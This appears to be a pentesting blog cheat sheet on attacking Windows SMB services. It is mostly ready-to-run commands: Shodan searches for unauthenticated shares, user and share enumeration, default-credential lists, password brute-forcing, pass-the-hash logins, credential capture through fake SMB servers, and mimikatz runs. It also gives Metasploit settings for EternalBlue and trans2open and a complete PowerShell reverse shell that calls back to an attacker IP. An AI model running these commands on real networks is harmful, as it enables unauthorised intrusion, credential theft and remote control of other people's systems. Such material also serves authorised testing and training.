Home SMB Pentesting Best Practices
Post
Cancel

SMB Pentesting Best Practices

SMB

SMB usually uses ports 445

What is SMB?

SMB is a network file and resource sharing protocol that uses a client-server model. SMB clients such as PCs on a network connect to SMB servers to access resources such as files and directories or perform tasks like printing over the network.

Often, the term CIFS short for Common Internet File System is used interchangeably with SMB. That is because CIFS was a popular Microsoft SMB implementation introduced with Windows 95. Since then, the informal use of CIFS to refer to SMB has remained common.

1
2
PORT     STATE SERVICE               VERSION
445/tcp  open  microsoft-ds 

How SMB Works

At a high-level, SMB communication is easy to understand. SMB clients connect to an SMB server using the SMB port to access SMB shares. Once they access the SMB shares, clients can do things such as collaborate on files without downloading them to their machines or print using a networked printer.

What is an SMB client?

An SMB client is the device that accesses resources on an SMB server. For example, within a corporate network, the user PCs that access a shared drive are SMB clients.

What is an SMB server?

An SMB server is the network server or cluster of servers where SMB shares are stored. The SMB server grants or denies SMB clients access to the shared resources (a.k.a. SMB shares).

What is an SMB Share?

An SMB share, also known as an SMB file share, is simply a shared resource on an SMB server. Often, an SMB share is a directory, but it can be any shared resource. For example, network printers are often shared using SMB.

What is the SMB port?

By default, modern implementations of SMB use TCP port 445 as the SMB port. Older SMB implementations (pre-Windows 2000) used SMB port 139.

Versions of SMB: Understanding SMB v1, SMB v2, and SMB v3

  • SMB v1 (SMB1)- The original SMB version. SMB1 began in the 1980s and has gone through multiple iterations. In Windows 95, Microsoft introduced CIFS as a way to implement SMB1. In modern applications, you should NOT use SMB v1 because it is insecure (no encryption, has been exploited in attacks like WannaCry and NotPetya) and inefficient (very “chatty” on networks creating congestion and reduced performance).
  • SMB v2 (SMB2)- SMB2 was introduced with Windows Vista. This version of SMB had significant improvements in performance and simplicity when compared to SMB1. Additionally, SMBv2 offered security enhancements. For example, SMB2.0.2 introduced pre-authentication integrity and SMB2 is not vulnerable to the same WannaCry and NotPeyta exploits that make SMB1 a security risk. SMB v2.1 was introduced with Windows 7 and Server 2008 R2, further improving performance and oplocks (opportunistic locking).
  • SMB v3 (SMB3)- SMB3 which introduced end-to-end SMB encryption and later are the most advanced and secure implementations of SMB. The first release of SMB3 (a.k.a. SMB v3.0) came with Windows 8 and Server 2012. SMB v3.02 was introduced in Windows 8.1 and Server 2012 R2. SMB 3.1.1 the latest SMB protocol was introduced with Windows 10 and Server 2016.

Information About SMB Versions

SMB VersionsOS Build
SMB1Win2000 / XP / 2003
SMB2.0Vista / 2008
SMB2.1Win7 / 2008R2
SMB3.0Win8 / 2012
SMB 3.02Win8.1 / 2012R2

SMB Pentesting

https://www.shodan.io/static/img/favicon.png Shodan search query :
port:445
#File Shares :"Authentication: disabled" port:445
#Specifically domain controllers: "Authentication: disabled" NETLOGON SYSVOL -unix port:445
#Concerning files: "Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445
#Search SMB Authentication enabled and SMB version 1 : port:445 country:CA region:NB "SMB Status Authentication: enabled SMB Version: 1"
#SMB version 1: SM Version 1

Scan a network searching for hosts:

1
nbtscan -r 10.10.x.x/24

SMB version enumeration:

1
2
3
4
5
msf > use auxiliary/scanner/smb/smb_version
# Discover real samba version if hidden
sudo ngrep -i -d tap0 ‘s.?a.?m.?b.?a.*[[:digit:]]’ & smbclient -L //10.10.x.x
crackmapexec smb 10.10.x.x 
nmap -sV -p445 --script smb-protocols 10.10.x.x

Untitled

Untitled

Untitled

Challenge Response support status and SMB signing support can be checked:

1
2
nmap -sV -p445 --script=smb-security-mode 10.10.x.x
nmap -sV -p445 --script=smb2-security-mode 10.10.x.x

Untitled

Connection Tools

Linux:

1
2
3
4
5
6
smbclient
smbget
/usr/share/doc/python-impacket/examples/ python scripts
smbexec.py and psexec.py 
wmiexec.py
smb4k

Windows:

1
net use

Possible Credentials

UsernamesCommon Passwords
(blank)(blank)
guest(blank)
Administrator, admin(blank), password, administrator, admin
arcservearcserve, backup
tivoli, tmersrvdtivoli, tmersrvd, admin
backupexec, backupbackupexec, backup, arcada
test, lab, demopassword, test, lab, demo

Obtain Information

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#Dump interesting information
enum4linux -a -u "0xhav0c" -p "Password123!" 10.10.x.x
nmap --script "safe or smb-enum-*" -p 445 10.10.x.x

#Connect to the rpc
rpcclient -U "" -N 10.10.x.x #No creds
rpcclient //192.168.x.x -U secybr.local/0xhav0c%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 secybr.local/0xhav0c:'Password123!'@192.168.x.x
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 secybr.local/0xhav0c:'Password123!'@192.168.x.x

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 secybr.local/0xhav0c:'Password123!'@192.168.x.x
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 secybr.local/0xhav0c:'Password123!'@192.168.x.x
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 secybr.local/0xhav0c:'Password123!'@192.168.x.x

nmblookup -A 10.10.x.x # Get NetBIOS from IP
enum4linux -a -R 500-600,950-1150 10.10.x.x # Enumeration using enum4linux  (identifier le nom/domaine + users + shares) 

####################
List shares
####################
smbclient -L //10.10.x.x
smbclient -L 10.10.x.x

####################
Connect
####################
smbclient \\\\192.168.x.x\\share 
smbclient -U "secybr.local\0xhav0c" \\\\10.10.x.x\\IPC$ password # Connect
smbclient -U "" -N \\\\10.10.x.x\\IPC$ # Specify username and no pass

####################
Nullinux for users and shares
####################
#Installation
git clone https://github.com/m8r0wn/nullinux
cd nullinux
sudo bash setup.sh
# Usage
python3 nullinux.py -users -quick secybr.local
python3 nullinux.py 192.168.x.x/24
python3 nullinux.py -u 'secybr.local\0xhav0c' -p 'Password123!' 10.10.x.x

# Other Enumeration Commands
smbmap -u 0xhav0c -p Password123! -d secybr.local -H 192.168.x.x # Smbmap for domains (List share drives, drive permissions, share contents, upload/download functionality..) | Basic enumeration (password or NTLM hash)
smbmap -u '0xhav0c' -p 'Password123!' -d secybr.com -H 10.10.x.x -x 'net group "Domain Admins" /domain' # Remote command execution
smbmap -H 10.10.x.x -u 0xhav0c -p 'Password123!' -r 'C$\Users' # Non-recursive path listing
smbmap --host-file AD-HOSTS.txt -u 0xhav0c -p 'Password123!' -d secybr.com -F 'password'# File content searching !!! It's not working stabil. 
smbmap -H 192.168.x.x -u 0xhav0c -p 'Password123!' -d secybr.com -L # Drive listing

####################
# Nifty Shell
####################
python smbmap.py -u 0xhav0c -p 'Password123!' -d secybr.local -H 192.168.x.x -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.y.y""""; $port=""""1337"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' 

nc -l 4445 # Listener for atacker Machine

Enumerating LSARPC and SAMR with rpcclient

You can use the Samba rpcclient utility to interact with RPC endpoints via named pipes. The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon establishing a SMB session (often requiring credentials).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#Users enumeration
List users: querydispinfo and enumdomusers
Get user details: queryuser <0xrid>
Get user groups: queryusergroups <0xrid>
GET SID of a user: lookupnames <username>
Get users aliases: queryuseraliases [builtin|domain] <sid>
#Groups enumeration
List groups: enumdomgroups
Get group details: querygroup <0xrid>
Get group members: querygroupmem <0xrid>
#Aliasgroups enumeration
List alias: enumalsgroups <builtin|domain>
Get members: queryaliasmem builtin|domain <0xrid>
#Domains enumeration
List domains: enumdomains
Get SID: lsaquery
Domain info: querydominfo
#More SIDs
Find SIDs by name: lookupnames <username>
Find more SIDs: lsaenumsid
RID cycling (check more SIDs): lookupsids <sid>

Create Fake SMB Shares for Capture the Credentials

1
python3 smbserver.py 0xhav0c /File/path/to/share/folder # 0xhav0c == Share Name 

fake smb server for the capture credentials fake smb server for the capture credentials

SMB Enumeration Scripts with Nmap

1
2
3
4
5
6
7
8
9
10
nmap -sV -p445 --script=smb-mbenum 10.10.x.x # Master Browser information can be listed.
nmap -sV -p445 --script=smb-os-discovery 10.10.x.x # Operating system version information can be obtained.
nmap -sV -p445 --script=smb-protocols 10.10.x.x # According to the answers to the sent queries, the protocols of the SMB version can be detected.
nmap -sV -p445 --script=smb2-capabilities 10.10.x.x # According to the answers to the sent queries, the protocols of the SMB version can be detected.
nmap -sV -p445 --script=smb-enum-domains 10.10.x.x
nmap -sV -p445 --script=smb-enum-groups 10.10.x.x
nmap -sV -p445 --script=smb-enum-processes 10.10.x.x
nmap -sV -p445 --script=smb-enum-sessions 10.10.x.x
nmap -sV -p445 --script=smb-server-stats 10.10.x.x
nmap -sV -p445 --script=smb-system-info 10.10.x.x

OS Detection with SMB OS Discovery script OS Detection with SMB OS Discovery script

The content of anonymous shares (NULL Session) can be listed.

1
2
3
4
5
smbclient -L 10.10.x.x -N
smbmap -H 10.10.x.x
smbmap -H 10.10.x.x -R
net use \\10.10.x.x\IPC$ "" /u:""
rpcclient 10.10.x.x -U "" -N

Shares and authorization can be listed with Guest authorization.

1
smbget -a smb://10.10.x.x/SharedFolder -R

Download the anonymous shares (NULL Session)

If you have the necessary privileges after running the command below, you can download the files in that file..

1
smbmap -H 192.168.x.x

Enum Shares & Privileges

First, let’s access the shared file.

1
smbclient -N \\\\192.168.x.x\\shared_folder

Access the shared File

When using smbclient to copy a directory, make sure to use the recurse and prompt commands. This makes it possible to non-interactively copy a directory and all of its contents. Then let’s run the following commands.

Caution will download all the files. Run smbclient in the directory where you will download the files.

1
2
3
smb: \> prompt
smb: \> recurse
smb: \> mget *

Download All shared Folder

Download All shared Folder

Shared printers can be detected.

1
net view \\10.10.x.x

Printable on shared printers.

1
nmap -sV -p445 --script=smb-print-text

The system clock and the initial start time of the SMB service can be determined.

1
nmap -sV -p445 --script=smb2-time

Backdoors left on the computer can be listed.

1
2
nmap -sV -p445 --script=stuxnet-detect
nmap -sV -p445 --script=smb-double-pulsar-backdoor

Usernames can be detected with the RID technique.

1
2
3
crackmapexec smb 10.10.x.0/24 -d Domain -u Usernames.list -p Password.list –rid-brute
nmap -sV -p445 --script=smb-enum-users
msf > use auxiliary/scanner/smb/smb_lookupsid

A general information gathering can be carried out. Obtain SMB server version, domain name, Nbtstat info, MAC address, operating system, users (querydispinfo and enumdomusers), shared directories, anonymous sharing control, password policy (via rpcclient), groups, members of groups, RID and SID info,… can be done.

1
enum4linux -a 10.10.x.x

The SMB service can be started. Thus, by listening to the network, the NTLM/LM password hashes of the users on the network and the encrypted Challenge values can be collected.

1
2
msf > use auxiliary/server/capture/smb
msf > use auxiliary/spoof/nbns/nbns_response

Valid users or passwords that can be logged in can be detected.

1
2
3
4
5
nmap -sV -p445 --script=smb-brute --script-args userdb=Usernames.list,passdb=Passwords.list,smblockout=1
msf > use auxiliary/scanner/smb/smb_login
hydra -t 2 -L Usernames.list -P Passwords.list -M IPAdresses.list -s TargetPort smb
medusa -t 2 -T 2 -U Usernames.list -P Passwords.list -H IPAdresses.list -n TargetPort -M smbnt
crackmapexec smb 10.10.x.x/24 -d secybr.local -u Usernames.list -p Passwords.list

Valid login users or password hashes can be identified.

1
2
3
4
msf > use auxiliary/scanner/smb/smb_login
hydra -t 2 -L Usernames.list -P Hashes.list -M TargetIPAdresses.list -s TargetPort -m "LocalHash" smb
medusa -t 2 -T 2 -U Usernames.list -P Hashes.list -H TargetIPAdresses.list -n TargetPort -m PASS:HASH -M smbnt
crackmapexec smb 10.10.x.x/24 -d secybr.local -u Usernames.list -H Hashes.list

Detailed information collection can be performed using identity information.

1
enum4linux -u secybr.local\\0xhav0c -p 'Password123!' -a 10.10.x.x

Shares can be listed using credentials.

1
2
3
4
5
6
7
8
9
10
nmap -sV -p445 --script=smb-enum-shares --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass='Password123!' 10.10.x.x
nmap -sV -p445 --script=smb-ls --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass='Password123!',share=’SharedFolder’ 10.10.x.x
nmap -sV -p445 --script=smb-enum-shares,smb-ls --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass='Password123!' 10.10.x.x
msf> use auxiliary/scanner/smb/smb_enumshares
smbclient //10.10.x.x/SharedFolder -U secybr.local\\0xhav0c
smbmap –host-file /path/to/TargetIPAddresses.list -d secybr.local -u 0xhav0c -p 'Password123!' -R
smbmap -H 10.10.x.x -R SharedFolder -A SearchingFileName
pth-smbclient -U secybr.local/0xhav0c%aad3b435b51404eeaad3b435b51404ee //10.10.x.x/SharedFolder
crackmapexec smb 10.10.x.x/24 -d secybr.local -u 0xhav0c -p 'Password123!' --shares
crackmapexec smb 10.10.x.x/24 -d secybr.local -u 0xhav0c -H '53f587baed383d5e8969457609f80a33333331a22a7e651:1b7951d1ee9e3363' --shares

accessing and downloading the known shared file with smbclient accessing and downloading the known shared file with smbclient

detecting shares, searching and downloading the known shared file with smbmap detecting shares, searching and downloading the known shared file with smbmap

Data from the share can be downloaded using credentials.

1
2
3
4
5
msf > use post/windows/gather/enum_shares
smbget smb://10.10.x.x/SharedFolder –user=secybr.local\\0xhav0c -R
mount -t cifs -o username=0xhav0c,password=Password123!,domain=secybr.local //10.10.x.x/SharedFolder /root/Desktop/SharedFile
smbmount //10.10.x.x/SharedFolder /root/Desktop/SharedFile -o username=0xhav0c,password=Password123!,rw
net use T: \\10.10.x.x\SharedFolder Password123! /user:secybr.local\0xhav0c /savecred /p:no

Local (and the domain the computer is in) users can be listed using their credentials.

1
2
3
nmap -sV -p445 --script=smb-enum-users --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x
msf > use auxiliary/scanner/smb/smb_enumusers
msf > use auxiliary/scanner/smb/smb_enumusers_domain

Local groups can be listed using credentials.

1
nmap -sV -p445 --script=smb-enum-groups --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x

Some other information gathering methods.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#Password policy, users,… etc. about domain using credentials. information can be listed.
nmap -sV -p445 --script=smb-enum-domains --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x 

#Operating system information, hardware, web browser, … etc., using credentials. information can be listed.
nmap -sV -p445 --script=smb-system-info --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x 

#Pipe information named using credentials can be listed.
msf > use auxiliary/scanner/smb/pipe_auditor

#By using credentials, process information running in the operating system can be listed.
nmap -sV -p445 --script=smb-enum-processes --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x 

#Using the credentials, the service information running in the operating system can be listed.
nmap -sV -p445 --script=smb-enum-services --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x 

#Users who have logged in (in systems where local administrator authority can be obtained) can be listed using the username and password (or password summary) information.
nmap -sV -p445 --script=smb-enum-sessions --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x 
msf > use auxiliary/scanner/smb/psexec_loggedin_users
crackmapexec smb 10.10.x.x/24 -C UsernamePassword.list –lusers

#Operating system SMB server statistics information can be listed using the credentials
nmap -sV -p445 --script=smb-server-stats --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x

#By using the credentials, the passwords registered in the Group Policy Preference in the domain the computer belongs to can be determined.
msf > use auxiliary/scanner/smb/smb_enum_gpp

Files on the SMB share can be retrieved using credentials.

1
2
3
4
smbclient //10.10.x.x/SharedFolder -U 'secybr.local\\0xhav0c' 'Password123!' -p TargetPort
recurse ON
prompt OFF
mget *

Access to the MS-RPC command line can be achieved using credentials.

1
rpcclient 10.10.x.x -U 'secybr.local\\0xhav0c'

Command can be run by using username and password information (in systems where local administrator authority can be obtained).

1
2
3
4
5
nmap -sV -p445 --script=smb-psexec.nse --script-args=smbuser=Username.list,smbpass=Password.list 10.10.x.x
smbmap –host-file /FullPath/TargetIP.list -d secybr.local -u 0xhav0c -p 'Password123!' -x "net user"
winexe -U secybr.local\\0xhav0c%Password123! //10.10.x.x "net user"
crackmapexec smb 10.10.x.x -u Username -p Password -M mimikatz -o COMMAND=privilege::debug
crackmapexec smb 10.10.x.x -u Username -H '53f587baed383d5e8969457609f80sdfdsfdsfsda22a7e651:1b7951d1ee9e3363' -M mimikatz -o COMMAND=privilege::debug

executing Mimikatz script from crackmapexec executing Mimikatz script from crackmapexec

Access to the Windows command line (Meterpreter, CMD, Powershell, …) can be achieved by using the username and password information (in systems where local administrator authority can be obtained).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
winexe -U secybr.local\\Username%Password //10.10.x.x "cmd.exe" –system
pth-winexe -U secybr.local/0xhav0c%aad3b435b51404eeaad3b435b51404ee //10.10.x.x cmd.exe –system

#Metasploit Framework
msf > use exploit/windows/smb/psexec
msf > use exploit/windows/smb/psexec_psh
msf > use exploit/windows/smb/smb_delivery

#Impackets
python psexec.py secybr.local/0xhav0c:Password123!@10.10.x.x
python smbexec.py secybr.local/0xhav0c:Password123!@10.10.x.x
python wmiexec.py secybr.local/0xhav0c:Password123!@10.10.x.x

#Windows Sysinternals: 
psexec.exe \\10.10.x.x -u secybr.local\0xhav0c -p Password cmd.exe /accepteula

Access to the Windows command line (Meterpreter, CMD, Powershell, …) can be achieved by using the username and password summary information (in systems where local administrator authority can be obtained).

1
2
3
4
5
6
7
8
9
10
pth-winexe -U secybr.local\\0xhav0c%aad3b435b51404eeaad3b435b51404ee //10.10.x.x "cmd.exe" –system

#Metasploit Framework
msf > use exploit/windows/smb/psexec
msf > use exploit/windows/smb/psexec_psh

#Impackets
python psexec.py secybr.local/0xhav0c@10.10.x.x -hashes 00000000000000000000000000000000:4a09d6777d034c2a5fced85d044a98e3
python smbexec.py secybr.local/0xhav0c@10.10.x.x -hashes 00000000000000000000000000000000:4a09d6777d034c2a5fced85d044a98e3
python wmiexec.py secybr.local/0xhav0c@10.10.x.x -hashes 00000000000000000000000000000000:4a09d6777d034c2a5fced85d044a98e3

Common SMB Vulnerabilities

DOS vulnerabilities using this service can be detected.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (uncredentialed check) [CVE-2009-2526]
nmap -sV -p445 --script=smb-vuln-cve2009-3103 10.10.x.x
nmap -sV -p445 --script=smb-vuln-cve2009-3103 --script-args unsafe=1 10.10.x.x
msf > use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh 10.10.x.x
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index 10.10.x.x

#MS10-006: Vulnerabilities in SMB Client Could Allow Remote Code Execution (978251)
msf > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop

#MS10-054: Vulnerabilities in SMB Server Could Allow Remote Code Execution (982214) [CVE-2010-2551] [CVE-2010-2552] (Remote Memory Corruption. Result is BSOD -> DANGEROUS)
nmap -sV -p445 --script=smb-vuln-ms10-054 --script-args unsafe=1 10.10.x.x

#Service regsvc vulnerability [CVE-2010-2550]
nmap -sV -p445 --script=smb-vuln-regsvc-dos 10.10.x.x

#SMB DOS
nmap -sV -p445 --script=smb-flood --script-args smbdomain=Domain,smbuser=Username,smbpass=Password 10.10.x.x

Various vulnerable systems using this service can be detected.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#MS03-026: Buffer Overrun In RPC Interface Could Allow Code Execution (823980) [CAN-2003-0352]
Exploit-DB: 66.c

#MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280) [CVE-2006-2370] (Buffer overflow in RRAS)
nmap -sV -p445 --script=smb-vuln-ms06-025 --script-args unsafe=1 10.10.x.x

#MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) [CVE-2006-3439]
use exploit/windows/smb/ms06_040_netapi ***

#MS07-029: Vulnerability in Windows DNS RPC Interface Could Allow Remote Code Execution (935966) [CVE-2007-1748] (Buffer overflow which can crash the RPC intrface in the DNS Server)
nmap -sV -p445 --script=smb-vuln-ms07-029 --script-args unsafe=1 10.10.x.x

#MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) [CVE-2008-4250] (Buffer overflow/RCE. Dangerous, can crash the target)
nmap -sV -p445 --script=smb-vuln-ms08-067 --script-args unsafe=1 10.10.x.x
nmap -sV -p445 --script=smb-vuln-conficker --script-args unsafe=1  10.10.x.x # (dangerous, can crash target)
Exploit-DB: 7132.py ***
msf > use exploit/windows/smb/ms08_067_netapi ***

#MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) [CVE-2010-2729] (Print vulnerability. Safe and can\'t crash the target)
nmap -sV -p445 --script=smb-vuln-ms10-061 --script-args unsafe=1 10.10.x.x

#MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (uncredentialed check) [CVE-2017-0143] (RCE, just checking if vulnerable)
nmap -sV -p445 --script=smb-vuln-ms17-010 --script-args unsafe=1 10.10.x.x
nmap -sV -p445 --script=smb2-vuln-uptime --script-args smb2-vuln-uptime.skip-os=true 10.10.x.x
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > use exploit/windows/smb/ms17_010_psexec

#(IMPORTANT MS17_010_PSEXEC is a staged payload, means you need meterpreter !)
#(IMPORTANT 2, if object can\'t be found, try to modify your target !)
set SHARE ADMIN$
set SMBDomain secybr.local
set ALLOW_GUEST true
set LPORT 445
set LHOST 10.10.y.y
set RHOST 10.10.x.x
set TARGET 3       #(TARGET 1 = PowerShell / TARGET 2 = Native / TARGET 3 = MOF => share ADMIN$)
set PAYLOAD windows/shell/reverse_tcp
set VERBOSE true
set DBGTRACE true
set EXITFUNC thread
exploit -j

#Trans2open Exploitation
# Samba 2.2.X are usually vulnerable to trans2open
msf > use exploit/linux/samba/trans2open
set VERBOSE true
set PAYLOAD linux/x86/shell_reverse_tcp
set RHOST 10.10.x.x
set LPORT 443
set LHOST IP
exploit -j -z

#Samba 3.4.5 Symlink Directory Traversal
# You can mount the root fiilesystem to a share you can access
https://www.exploit-db.com/exploits/33599

# Using metasploit
https://www.exploit-db.com/exploits/33598
msf > use auxiliary/admin/smb/samba_symlink/traversal
This post is licensed under CC BY 4.0 by the author.

SNMP Pentesting Best Practicies

Redis Pentesting Best Practices

Comments powered by Disqus.

Powered by 0xhav0c © 2022